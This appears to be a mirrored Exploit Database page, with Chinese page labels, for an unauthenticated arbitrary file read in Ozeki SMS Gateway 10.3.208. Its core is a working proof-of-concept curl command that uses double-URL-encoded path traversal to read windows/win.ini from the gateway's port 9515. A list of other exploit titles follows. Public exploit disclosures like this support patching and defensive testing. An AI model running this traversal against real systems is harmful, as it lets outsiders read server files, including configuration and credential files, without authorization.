Ozeki SMS Gateway 10.3.208 – Arbitrary File Read (Unauthenticated)

Exploit Database
18 阅读

作者： Ahmet Ümit BAYRAM

日期： 2023-08-04
类别：
- webapps
平台：
- multiple
来源：https://www.exploit-db.com/exploits/51646/

# Exploit Title: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)
# Date: 01.08.2023
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://ozeki-sms-gateway.com
# Software Link:
https://ozeki-sms-gateway.com/attachments/702/installwindows_1689352737_OzekiSMSGateway_10.3.208.zip
# Version: 10.3.208
# Tested on: Windows 10



##################################### Arbitrary File Read PoC
#####################################

curl
https://localhost:9515/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini

##################################### Arbitrary File Read PoC
#####################################

last Exploits
Ozeki SMS Gateway 10.3.208 – Arbitrary File Read (Unauthenticated)的更多信息

Joomla! Component com_SimpleShop – SQL Injection：
Point of Sales (POS) in VB.Net MySQL Database 1.0 – SQL Injection：
Microsoft SharePoint Enterprise Server 2016 – Spoofing：
WordPress Plugin Mingle Forum 1.0.31 – SQL Injection：
Fantastic Blog CMS 1.0 – ‘id’ SQL Injection：
IPN Development Handler 2.0 – Multiple Vulnerabilities：
ECSIMAGING PACS 6.21.5 – Remote code execution：
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 – Authentication Bypass：